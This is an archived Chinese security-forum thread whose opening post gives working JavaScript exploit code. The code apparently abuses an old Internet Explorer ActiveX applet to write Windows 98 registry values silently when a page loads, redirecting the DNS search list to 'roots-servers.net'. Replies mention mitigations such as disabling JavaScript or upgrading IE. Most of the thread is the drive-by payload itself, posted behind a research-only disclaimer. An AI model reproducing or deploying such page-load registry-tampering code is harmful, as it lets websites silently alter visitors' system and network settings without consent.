这是在 20CN网络安全小组第一代论坛 的论坛 安全漏洞 中的主题 javascript的问题


要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=3;t=000310
苏樱 (编号: 10) 发表于 :
 
这里有一段代码,可以向win98的注册表写入任何值

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se
rvers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>


解决方法: 在ie中禁止javascript
 

电脑医生 (编号: 2784) 发表于 :
 
有网站修改IE标题用的就是这个,升级IE也可以避开这个IE漏洞。
 
1567494 (编号: 2535) 发表于 :
 
我认为这段攻击还不算恨,如果你在注册表里用域名和密码攻击这台计算机,在没有注册表BAK的前提下是没有机会恢复的,只有从做了!
 




Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。